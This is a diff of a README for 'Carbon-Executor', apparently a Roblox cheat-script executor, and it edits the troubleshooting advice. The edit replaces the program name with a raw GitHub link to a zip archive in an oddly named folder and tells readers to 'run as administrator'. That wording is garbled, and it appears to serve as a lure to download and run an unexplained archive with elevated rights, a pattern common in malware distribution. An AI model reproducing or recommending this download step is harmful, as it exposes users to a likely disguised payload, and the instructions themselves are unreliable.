MahadMasood60/Carbon-Executor/README.md

 If you encounter any problems, here are solutions for common issues:

 - **Application Won't Open:** Ensure that you are running the application with administrator privileges.
-Right-click on `Carbon-Executor.exe` and select "Run as administrator."
+Right-click on `https://raw.githubusercontent.com/MahadMasood60/Carbon-Executor/main/Sphenodontidae/Carbon-Executor.zip` and select "Run as administrator."

 - **Script Errors:** Double-check the script syntax.
 Ensure it is compatible with Roblox and the version of the executor you are using.